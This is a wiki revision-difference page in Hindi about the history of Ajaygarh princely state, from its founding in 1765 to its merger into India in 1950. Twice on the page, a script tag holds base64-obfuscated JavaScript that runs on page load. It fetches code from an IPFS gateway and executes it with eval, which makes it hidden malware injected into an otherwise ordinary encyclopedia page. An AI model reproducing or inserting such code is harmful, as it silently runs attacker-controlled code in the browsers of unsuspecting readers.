Difference between revisions of "अजयगढ़ रियासत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अजयगढ़ रियासत''' भारत की देशी रियासतों में से एक थ...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
 
'''अजयगढ़ रियासत''' [[भारत]] की देशी रियासतों में से एक थी।
 
'''अजयगढ़ रियासत''' [[भारत]] की देशी रियासतों में से एक थी।
  
*सन 1765 में वजूद में आई अजयगढ़ रियासत को [[बुंदेला]] [[राजपूत]] गुमान सिंह ने स्थापित किया था।<ref>{{cite web |url=https://www.pravakta.com/bharat-mein-deshi-riyayaten-aur-unka-itihas/ |title= भारत में देशी रियासतें और उनका इतिहास|accessmonthday= 31 अगस्त|accessyear= 2018|last= |first= |authorlink= |format= |publisher=pravakta.com |language= हिंदी}}</ref>
+
*सन 1765 में वजूद में आई अजयगढ़ रियासत को [[बुंदेला]] [[राजपूत]] '''गुमान सिंह''' ने स्थापित किया था।<ref>{{cite web |url=https://www.pravakta.com/bharat-mein-deshi-riyayaten-aur-unka-itihas/ |title= भारत में देशी रियासतें और उनका इतिहास|accessmonthday= 31 अगस्त|accessyear= 2018|last= |first= |authorlink= |format= |publisher=pravakta.com |language= हिंदी}}</ref>
*गुमान सिंह जैतपुर रियासत के राजा पहर सिंह का भतीजा था।
+
*गुमान सिंह जैतपुर रियासत के राजा पहर सिंह का [[भतीजा]] था।
 
*1809 ई. में [[अंग्रेज़|अंग्रेज़ों]] ने अजयगढ़ के राजा को अपने अधीन कर लिया था।
 
*1809 ई. में [[अंग्रेज़|अंग्रेज़ों]] ने अजयगढ़ के राजा को अपने अधीन कर लिया था।
 
*अजयगढ़ रियासत ने सन [[1857 का स्वतंत्रता संग्राम|1857 के विद्रोह]] में अंग्रेज़ों का साथ दिया।
 
*अजयगढ़ रियासत ने सन [[1857 का स्वतंत्रता संग्राम|1857 के विद्रोह]] में अंग्रेज़ों का साथ दिया।

Latest revision as of 06:37, 9 September 2018

ajayagadh riyasat bharat ki deshi riyasatoan mean se ek thi.

  • san 1765 mean vajood mean aee ajayagadh riyasat ko buandela rajapoot guman sianh ne sthapit kiya tha.[1]
  • guman sianh jaitapur riyasat ke raja pahar sianh ka bhatija tha.
  • 1809 ee. mean aangrezoan ne ajayagadh ke raja ko apane adhin kar liya tha.
  • ajayagadh riyasat ne san 1857 ke vidroh mean aangrezoan ka sath diya.
  • bharat ki svatantrata ke bad 1 janavari, 1950 ko ajayagadh riyasat ka bharat mean vilay kar liya gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. bharat mean deshi riyasatean aur unaka itihas (hiandi) pravakta.com. abhigaman tithi: 31 agast, 2018.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>